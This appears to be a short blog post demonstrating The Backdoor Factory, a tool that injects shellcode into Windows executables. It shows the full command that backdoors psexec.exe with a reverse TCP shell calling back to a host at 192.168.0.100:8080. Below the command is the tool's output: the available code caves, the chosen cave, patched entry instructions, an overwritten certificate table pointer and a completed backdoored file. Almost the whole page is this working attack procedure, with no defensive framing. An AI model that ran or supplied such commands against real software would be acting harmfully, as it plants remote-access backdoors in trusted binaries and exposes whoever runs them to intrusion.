The Backdoor Factory (BDF) – Patch Binaries With Shellcode

./backdoor.py f psexec.exe H 192.168.0.100 P 8080 s reverse_shell_tcp

[*] In the backdoor module

[*] Checking if binary is supported

[*] Gathering file info

[*] Reading win32 entry instructions

[*] Looking for and setting selected shellcode

[*] Creating win32 resume execution stub

[*] Looking for caves that will fit the minimum shellcode length of 402

[*] All caves lengths:  (402,)

############################################################

The following caves can be used to inject code and possibly

continue execution.

**Don‘t like what you see? Use jump, single, append, or ignore.**

############################################################

[*] Cave 1 length as int: 402

[*] Available caves:

1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507

2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492

3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501

4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492

5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505

6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498

7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495

8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505

9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559

10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559

**************************************************

[!] Enter your selection: 5

Using selection: 5

[*] Changing Section Flags

[*] Patching initial entry instructions

[*] Creating win32 resume execution stub

[*] Overwriting certificate table pointer

[*] psexec.exe backdooring complete

File psexec.exe is in the ‘backdooreddirectory

Leave a Reply